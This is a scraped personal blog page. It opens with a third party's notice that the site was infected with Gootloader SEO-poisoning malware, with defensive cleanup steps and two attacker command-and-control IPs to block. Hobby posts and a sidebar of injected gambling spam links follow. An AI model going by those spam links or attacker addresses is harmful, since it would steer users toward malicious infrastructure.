Gootloader infection cleaned up
Dear blog owner and visitors,
This blog had been infected to serve up Gootloader malware to Google search victims, via a common tactic known as SEO (Search Engine Optimization) poisioning. Your blog was serving up 320 malicious pages. Your blogged served up malware to 0 visitors.
I tried my best to clean up the infection, but I would do the following:
- Upgrade WordPress to the latest version (one way the attackers might have gained access to your server)
- Upgrade all WordPress themes to the latest versions (another way the attackers might have gained access to your server)
- Upgrade all WordPress plugins (another way the attackers might have gained access to your server), and remove any unnecessary plugins.
- Verify all users are valid (in case the attackers left a backup account, to get back in)
- Change all passwords (for WordPress accounts, FTP, SSH, database, etc.) and keys. This is probably how the attackers got in, as they are known to brute force weak passwords
- Run antivirus scans on your server
- Block these IPs (22.214.171.124 and 126.96.36.199), either in your firewall, .htaccess file, or in your /etc/hosts file, as these are the attackers command and control servers, which send malicious commands for your blog to execute
- Check cronjobs (both server and WordPress), aka scheduled tasks. This is a common method that an attacker will use to get back in. If you are not sure, what this is, Google it
- Consider wiping the server completly, as you do not know how deep the infection is. If you decide not to, I recommend installing some security plugins for WordPress, to try and scan for any remaining malicious files. Integrity Checker, WordPress Core Integrity Checker, Sucuri Security,
and Wordfence Security, all do some level of detection, but not 100% guaranteed
- Go through the process for Google to recrawl your site, to remove the malcious links (to see what malicious pages there were, Go to Google and search site:your_site.com agreement)
- Check subdomains, to see if they were infected as well
- Check file permissions
Gootloader (previously Gootkit) malware has been around since 2014, and is used to initally infect a system, and then sell that access off to other attackers, who then usually deploy additional malware, to include ransomware and banking trojans. By cleaning up your blog, it will make a dent in how they infect victims. PLEASE try to keep it up-to-date and secure, so this does not happen again.
The Internet Janitor
Below are some links to research/further explaination on Gootloader:
Ok, so I have the new minecraft servers up, they are whitelist only, so if you want to be added, email me at firstname.lastname@example.org.
Forge Modded 1.10.2: Mods are here. Forge 1.10.2 188.8.131.529
Forge is available here: //files.minecraftforge.net/
Pixelmon: Using 1.10.2 5.0.0, Forge 1.10.2 184.108.40.2069
Pixelmon is available here: //pixelmonmod.com/downloads.php
A social experiment involving podcasts, twitter and alcohol.
Completely Unofficial NetHeads Drinking Game Rules
AKA “Excuses for Alcoholics” (Thanks Will!) Alpha 0.8
Submit any revisions via Twitter to @routerninja.
- Any time Will starts the show more than 10 minutes late, Drink.
- Drink again if it’s due to some sort of liquid spillage catastrophe, Lemonade or otherwise.
- Should a SMeltdown occur, and you heard the original opening before the restart, drink.
- Finish your drink if the show has to restart more than once.
- Any time Will mentions a movie or TV Show Trent hasn’t seen. Drink. Rule also applies in reverse.
- Any time Trent makes an overtly homoerotic “joke” in a vague attempt at coming out, Drink.
- Any time Trent is broken, finish your drink. (Only applicable once per episode)
- Any time someone calls in, Drink.
- If Will attempts math at ANY time during the show, drink.
- If Will gets it right, drink again.
- If Will or Trent can correctly define Zeitgeist without the use of wikipedia, finish your drink.
(Unfortunately this rule only applies once)
- Any time Trent manages to sneak in any talk of fantasy football, drink.
- If you are following along on Twitter and your tweet is read on the air, drink.
- Any time Trent says “Progrum” , Drink.
- (REDACTED In the interest of my liver and public safety)
- Any time Will or Trent debate the pronunciation of someone’s Twitter handle, drink. (Thanks @Kouban, and drink twice if it’s his because I don’t think they’ve got it right yet.)
- Anytime Will gives a “Woo!”, Drink. (Thanks @Netheadww)
- Francis calling? Drink up! (Thanks Trent!)
- Anytime Will tries to segue with “I dont know about you guys..” Drink!
- Anytime Will admits to not listening to what Trent was saying while eating/drinking/updating twitter, Drink!
Please Note: Routerninja.net, Smodcast.com, The Netheads Show and their affiliates are in no way responsible for any liver damage, alcohol poisoning, drunk dialing, texting or emailing (Thanks @squidjam), bad decisions or damage to any property, sanity, sexual preference or dignity due to this game. Play at your own risk, don’t drink and drive, always keep your stick on the ice, and whatever you do, don’t miss Netheads on Sundays at 6pm Pacific, 9pm Eastern on Smodcast Internet Radio.
ONE OF US! ONE OF US!
So my mom has been offically inducted into the Cult of Mac. After having her card number stolen via malware and various recurring virus issues, she started asking me about my mac, since she used it when she was at my place in Atlanta.. So of course last night I popped into her XP machine via TeamViewer when she needed to ask me something and I see an Apple Store receipt on her screen for a new Macbook pro, iPad 2, AppleTV and applecare for everything..
Happy, but somewhat stressed since I know I’m going to have to set it all up for her, but I know the calls will be less “OMFG SOME RUSSIAN STOLE EVERYTHING” and more “Hey, how do I upload stuff in iPhoto”. and that I can handle.
And I’m not bitter at all that her laptop will be better than mine, nope, not one bit.
Maybe a little.
Once again I am late to the party..
So I came into Nerdcore late. I really got into MC Fronalot, MC Lars, Beefy, YT Cracker, and all the rest.. Now of course I have the problem of wanting to see them live, and I dont think most of them are coming anywhere near me. I missed MC Lars and MC Chris in Atlanta a couple weeks ago. So my favorite nerdcore track has got to be “Ones and Zeroes” with Beefy and YT Cracker. I dug the “Nerdy South” line, being in Atlanta and hearing the “Dirty Souf” crap, it was a nice way to bring it back to the geeks. I cant seem to find it on youtube, so you’ll have to check it out on Spotify or iTunes or whatever method you use for getting your music.. Close second would be MC Frontalot’s “Victorian Space Prostitute” which is a great breakdown of every cosplayer I have ever seen.
I’ll add more as I think of it.
Logitech finally catches up to 6 months ago.
So my Logitech Revue is finally getting the Honeycomb upgrade. I gotta admit it looks pretty cool. Mom may end up getting my ATV and I can get a 2nd Revue for the bedroom.
Got a mention on SBN #46 this week also.
SBN being Sound Bite Nation, the podcast that follows NetHeads on SIR on Sunday nights. I sent them a D-Bag of the week suggestion and it looks like they used it on their show, got a couple nice shout outs, always good to help feed the ego 🙂 Kind of took me by surprise on the way into work as I was listening and I heard my twitter handle.. Not a bad way to start the day. I admit I still get those “They said my name, I’m routerninja! I’m that guy!” moments sometimes. I know, stupid fanboy moment but its neat to me. 🙂
Yay for Friday!
So I have settled into my job this morning as an engineer at a Death Star themed telephone company. 🙂 Got my 1 year coming up here and I’m pretty happy how things are going. Got the kids coming over tonight for another fun-filled weekend. Have to make sure to remember to hit the grocery store on the way home. I am woefully low on kid supplies. That and I think I promised Abby a meatloaf. not sure why. Here’s to hoping the day goes by a little faster today.
So I called into NetHeads last Sunday.
It was a pretty good experience, I think there was some delay because I dont remember that much dead air and lulls in the conversation, my call starts at about the 41-42 minute mark, goes for about 10-15 minutes, and we cover a lot of ground from games to hockey. It was pretty awesome to be able to talk to Will and Trent, and I think I will have to do it again soon.
A reboot was needed.
So I have had various handles since I dialed up to my first BBS in 1985. I’ve had lots of changes in my life, love and loss. But I think it’s about time for a serious reboot. I adopted the Routerninja name as a joke when I worked at AOL. and I guess it’s kinda stuck. So I decided today to grab the domain and build something new for me..
Hope ya’ll like it.
- Are There Any Slot Machines In Toronto
- Great Canada Gambling Game
- Online Gambling For Real Money Ca
- Popular Online Casino In Canada Games Real Money
- Free Chip Online Casino Ca
- New Casino Kingston Ca
- Ca Gambling Regulator
- How To Play Roulette In Canada
- Ontario Slots Canada
- Casino Gambling Ca
- Canada Blackjack Age
- Slot Machines In Toronto Run Windows
- February 2023 (3863)
- March 2022 (1)
- November 2016 (1)
- November 2011 (2)
- October 2011 (6)